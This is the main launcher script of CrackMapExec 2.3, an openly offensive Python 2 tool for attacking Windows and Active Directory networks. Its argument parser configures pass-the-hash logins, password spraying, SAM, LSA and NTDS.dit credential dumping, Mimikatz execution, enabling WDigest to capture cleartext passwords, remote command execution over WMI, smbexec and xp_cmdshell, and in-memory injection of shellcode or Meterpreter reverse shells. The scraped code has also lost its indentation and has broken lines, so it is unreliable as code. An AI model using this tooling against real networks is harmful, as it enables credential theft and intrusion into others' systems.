
299 lines
17 KiB
Executable File

#!/usr/bin/env python2
#This must be one of the first imports or else we get threading error on completion
from gevent import monkey
from gevent.pool import Pool
from gevent import joinall, sleep
from core.logger import *
from core.greenlets import main_greenlet
from core.settings import init_args
from core.servers.mimikatz import http_server, https_server
from argparse import RawTextHelpFormatter
from netaddr import IPAddress, IPRange, IPNetwork, AddrFormatError
from logging import DEBUG
import re
import argparse
import sys
import os
VERSION = '2.3'
CODENAME = '\'Pink Bubbles\''
if sys.platform == 'linux2':
if os.geteuid() is not 0:
print_error('I needz r00tz!')
parser = argparse.ArgumentParser(description="""
______ .______ ___ ______ __ ___ .___ ___. ___ .______ _______ ___ ___ _______ ______
/ || _ \ / \ / || |/ / | \/ | / \ | _ \ | ____|\ \ / / | ____| / |
| ,----'| |_) | / ^ \ | ,----'| ' / | \ / | / ^ \ | |_) | | |__ \ V / | |__ | ,----'
| | | / / /_\ \ | | | < | |\/| | / /_\ \ | ___/ | __| > < | __| | |
| `----.| |\ \----. / _____ \ | `----.| . \ | | | | / _____ \ | | | |____ / . \ | |____ | `----.
\______|| _| `._____|/__/ \__\ \______||__|\__\ |__| |__| /__/ \__\ | _| |_______|/__/ \__\ |_______| \______|
Swiss army knife for pentesting Windows/Active Directory environments | @byt3bl33d3r
Powered by Impacket (@agsolino)
Inspired by:
@ShawnDEvans's smbmap
@gojhonny's CredCrack
@pentestgeek's smbexec
{}: {}
{}: {}
version='{} - {}'.format(VERSION, CODENAME),
epilog='There\'s been an awakening... have you felt it?')
parser.add_argument("target", nargs='*', type=str, help="The target IP, range, CIDR identifier, hostname, FQDN or list or file containg a list of targets")
parser.add_argument("-t", type=int, dest="threads", default=100, help="Set how many concurrent threads to use (defaults to 100)")
parser.add_argument("-u", metavar="USERNAME", dest='user', type=str, default=None, help="Username(s) or file containing usernames")
parser.add_argument("-p", metavar="PASSWORD", dest='passwd', type=str, default=None, help="Password(s) or file containing passwords")
parser.add_argument("-H", metavar="HASH", dest='hash', type=str, default=None, help='NTLM hash(es) or file containing NTLM hashes')
parser.add_argument("-C", metavar="COMBO_FILE", dest='combo_file', type=str, default=None, help="Combo file containing a list of domain\\username:password or username:password entries")
parser.add_argument('-k', action="store", dest='aesKey', metavar="HEX_KEY", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
parser.add_argument("-d", metavar="DOMAIN", dest='domain', default=None, help="Domain name")
parser.add_argument("-n", metavar='NAMESPACE', dest='namespace', default='//./root/cimv2', help='WMI Namespace (default: //./root/cimv2)')
parser.add_argument("-s", metavar="SHARE", dest='share', default="C$", help="Specify a share (default: C$)")
parser.add_argument('--kerb', action="store_true", dest='kerb', help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters')
parser.add_argument("--port", dest='port', type=int, choices={139, 445}, default=445, help="SMB port (default: 445)")
parser.add_argument("--server", choices={'http', 'https'}, default='http', help='Use the selected server (defaults to http)')
parser.add_argument("--server-port", metavar='PORT', type=int, help='Start the server on the specified port')
#How much fail can we limit? can we fail at failing to limit? da da da dum
parser.add_argument("--fail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed per host (default: None)')
parser.add_argument("--gfail-limit", metavar='LIMIT', type=int, default=None, help='The max number of failed login attempts allowed globally (default: None)')
parser.add_argument("--verbose", action='store_true', dest='verbose', help="Enable verbose output")
rgroup = parser.add_argument_group("Credential Gathering", "Options for gathering credentials")
rgroup.add_argument("--sam", action='store_true', help='Dump SAM hashes from target systems')
rgroup.add_argument("--lsa", action='store_true', help='Dump LSA secrets from target systems')
rgroup.add_argument("--gpp-passwords", action='store_true', help='Retrieve plaintext passwords and other information for accounts pushed through Group Policy Preferences')
rgroup.add_argument("--ntds", choices={'vss', 'drsuapi', 'ninja'}, help="Dump the NTDS.dit from target DCs using the specifed method\n(drsuapi is the fastest)")
rgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
rgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
rgroup.add_argument("--mimikatz", action='store_true', help='Run Invoke-Mimikatz (sekurlsa::logonpasswords) on target systems')
rgroup.add_argument("--mimikatz-cmd", metavar='MIMIKATZ_CMD', help='Run Invoke-Mimikatz with the specified command')
rgroup.add_argument("--enable-wdigest", action='store_true', help="Creates the 'UseLogonCredential' registry key enabling WDigest cred dumping on Windows >= 8.1")
rgroup.add_argument("--disable-wdigest", action='store_true', help="Deletes the 'UseLogonCredential' registry key")
egroup = parser.add_argument_group("Mapping/Enumeration", "Options for Mapping/Enumerating")
egroup.add_argument("--shares", action="store_true", dest="enum_shares", help="List shares")
egroup.add_argument('--check-uac', action='store_true', dest='check_uac', help='Checks UAC status')
egroup.add_argument("--sessions", action='store_true', dest='enum_sessions', help='Enumerate active sessions')
egroup.add_argument('--disks', action='store_true', dest='enum_disks', help='Enumerate disks')
egroup.add_argument("--users", action='store_true', dest='enum_users', help='Enumerate users')
egroup.add_argument("--rid-brute", nargs='?', const=4000, metavar='MAX_RID', dest='rid_brute', help='Enumerate users by bruteforcing RID\'s (defaults to 4000)')
egroup.add_argument("--pass-pol", action='store_true', dest='pass_pol', help='Dump password policy')
egroup.add_argument("--lusers", action='store_true', dest='enum_lusers', help='Enumerate logged on users')
egroup.add_argument("--powerview", metavar='POWERVIEW_CMD', dest='powerview', help='Run the specified PowerView command')
egroup.add_argument("--wmi", metavar='QUERY', type=str, dest='wmi_query', help='Issues the specified WMI query')
sgroup = parser.add_argument_group("Spidering", "Options for spidering shares")
sgroup.add_argument("--spider", metavar='FOLDER', nargs='?', const='.', type=str, help='Folder to spider (defaults to top level directory)')
sgroup.add_argument("--content", dest='search_content', action='store_true', help='Enable file content searching')
sgroup.add_argument("--exclude-dirs", type=str, metavar='DIR_LIST', default='', dest='exclude_dirs', help='Directories to exclude from spidering')
sgroup.add_argument("--pattern", type=str, help='Pattern to search for in folders, filenames and file content')
sgroup.add_argument("--patternfile", type=str, help='File containing patterns to search for in folders, filenames and file content')
sgroup.add_argument("--depth", type=int, default=10, help='Spider recursion depth (default: 10)')
cgroup = parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument('--execm', choices={"wmi", "smbexec", "atexec"}, default="wmi", help="Method to execute the command (default: wmi)")
cgroup.add_argument('--force-ps32', action='store_true', dest='force_ps32', help='Force all PowerShell code/commands to run in a 32bit process')
cgroup.add_argument('--no-output', action='store_true', dest='no_output', help='Do not retrieve command output')
cgroup.add_argument("-x", metavar="COMMAND", dest='command', help="Execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='pscommand', help='Excute the specified powershell command')
xgroup = parser.add_argument_group("Shellcode/EXE/DLL/Meterpreter Injection", "Options for injecting Shellcode/EXE/DLL/Meterpreter in memory using PowerShell")
xgroup.add_argument("--inject", choices={'shellcode', 'exe', 'dll', 'met_reverse_https', 'met_reverse_http'}, help='Inject Shellcode, EXE, DLL or Meterpreter')
xgroup.add_argument("--path", type=str, help='Path to the Shellcode/EXE/DLL you want to inject on the target systems (ignored if injecting Meterpreter)')
xgroup.add_argument('--procid', type=int, help='Process ID to inject the Shellcode/EXE/DLL/Meterpreter into (if omitted, will inject within the running PowerShell process)')
xgroup.add_argument("--exeargs", type=str, help='Arguments to pass to the EXE being reflectively loaded (ignored if not injecting an EXE)')
xgroup.add_argument("--met-options", nargs=2, metavar=('LHOST', 'LPORT'), dest='met_options', help='Meterpreter options (ignored if not injecting Meterpreter)')
bgroup = parser.add_argument_group("Filesystem Interaction", "Options for interacting with filesystems")
bgroup.add_argument("--list", metavar='PATH', nargs='?', const='.', type=str, help='List contents of a directory (defaults to top level directory)')
bgroup.add_argument("--download", nargs=2, metavar=('SRC', 'DST'), help="Download a file from the remote systems")
bgroup.add_argument("--upload", nargs=2, metavar=('SRC', 'DST'), help="Upload a file to the remote systems")
bgroup.add_argument("--delete", metavar="PATH", help="Delete a remote file")
wgroup = parser.add_argument_group("Service Interaction", "Options for interacting with Windows services")
wgroup.add_argument("--service", choices={'list', 'start', 'stop', 'delete', 'status', 'config', 'create', 'change'})
wgroup.add_argument("--name", dest='service_name', metavar='NAME', help='Service name')
wgroup.add_argument("--display", dest='service_display_name', metavar='NAME', help='Service display name')
wgroup.add_argument("--bin-path", dest='service_bin_path', metavar='PATH', help='Binary path')
wgroup.add_argument("--service-type", metavar='TYPE', help='Service type')
wgroup.add_argument("--start-type", metavar='TYPE', help='Service start type')
wgroup.add_argument("--start-name", metavar='NAME', help='Name of the account under which the service should run')
wgroup.add_argument("--start-pass", metavar='PASS', help='Password of the account whose name was specified with the --start-name parameter')
mgroup = parser.add_argument_group("MSSQL Interaction", "Options for interacting with MSSQL DB's")
mgroup.add_argument("--mssql", nargs='?', const='', metavar='QUERY', help='Authenticate with the provided credentials against the MSSQL service, optionally execute the specified query')
mgroup.add_argument("--mssql-port", default=1433, metavar='PORT', help='MSSQL service port (default: 1433)')
mgroup.add_argument("--mssql-instance", action='store_true', help='Enumerate the MSSQL intances on the target hosts')
mgroup.add_argument("--enable-xpcmdshell", action='store_true', help='Enable xp_cmdshell on target DB\'s')
mgroup.add_argument("--disable-xpcmdshell", action='store_true', help='Disable xp_cmdshell on target DB\'s')
mgroup.add_argument("--xp-cmd", metavar='COMMAND', help='Execute the specified command using xp_cmdshell')
if len(sys.argv) == 1:
args = parser.parse_args()
patterns = []
targets = []
if args.server == 'http':
if args.server_port:
args.http_port = args.server_port
args.server_port = 80
if args.server == 'https':
if args.server_port:
args.https_port = args.server_port
args.server_port = 443
if args.verbose:
setup_logger('_'.join(, DEBUG)
###################### Just a bunch of error checking to make sure everythings good to go ######################
if args.inject:
if not args.inject.startswith('met_'):
if not args.path:
print_error("You must specify a '--path' to the Shellcode/EXE/DLL to inject")
elif args.path:
if not os.path.exists(args.path):
print_error('Unable to find Shellcode/EXE/DLL at specified path')
elif args.inject.startswith('met_'):
if not args.met_options:
print_error("You must specify Meterpreter's handler options using '--met-options'" )
if args.spider:
if not args.pattern and not args.patternfile:
print_error("You must specify a --pattern or --patternfile")
if args.patternfile:
if not os.path.exists(args.patternfile):
print_error("Unable to find pattern file at specified path")
for line in args.patternfile.readlines():
line = line.rstrip()
patterns.append(re.compile(line, re.IGNORECASE))
patterns.extend(re.compile(patt, re.IGNORECASE) for patt in args.pattern.split(','))
args.pattern = patterns
args.exclude_dirs = args.exclude_dirs.split(',')
if args.combo_file and not os.path.exists(args.combo_file):
print_error('Unable to find combo file at specified path')
if args.service:
if args.service in ['start', 'stop', 'delete', 'status', 'config', 'change']:
if not args.service_name:
print_error('You must specify a --name')
elif args.service == 'create':
if not args.service_name or not args.service_display_name or not args.service_bin_path:
print_error('You must specify --name, --display and --bin-path')
if args.ntds_history or args.ntds_pwdLastSet:
if not args.ntds:
print_error('--ntds-history and --ntds-pwdLastSet require --ntds')
def populate_targets(target):
if '-' in target:
ip_range = target.split('-')
hosts = IPRange(ip_range[0], ip_range[1])
except AddrFormatError:
start_ip = IPAddress(ip_range[0])
start_ip_words = list(start_ip.words)
start_ip_words[-1] = ip_range[1]
start_ip_words = [str(v) for v in start_ip_words]
end_ip = IPAddress('.'.join(start_ip_words))
t = IPRange(start_ip, end_ip)
except AddrFormatError:
t = target
t = IPNetwork(target)
except AddrFormatError:
t = target
if type(t) == IPNetwork or type(t) == IPRange:
for target in
if os.path.exists(target):
with open(target, 'r') as target_file:
for target_entry in target_file:
if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
if args.server == 'http':
elif args.server == 'https':
def concurrency(targets):
Open all the greenlet (as supposed to redlet??) threads
Whoever came up with that name has a fetish for traffic lights
pool = Pool(args.threads)
jobs = [pool.spawn(main_greenlet, str(target)) for target in targets]
except KeyboardInterrupt:
if args.mimikatz or args.powerview or args.gpp_passwords or args.mimikatz_cmd or args.inject or args.ntds == 'ninja':
while True:
except KeyboardInterrupt: